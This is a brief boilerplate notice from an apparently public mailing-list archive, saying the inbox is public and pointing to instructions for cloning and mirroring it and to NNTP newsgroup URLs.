This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).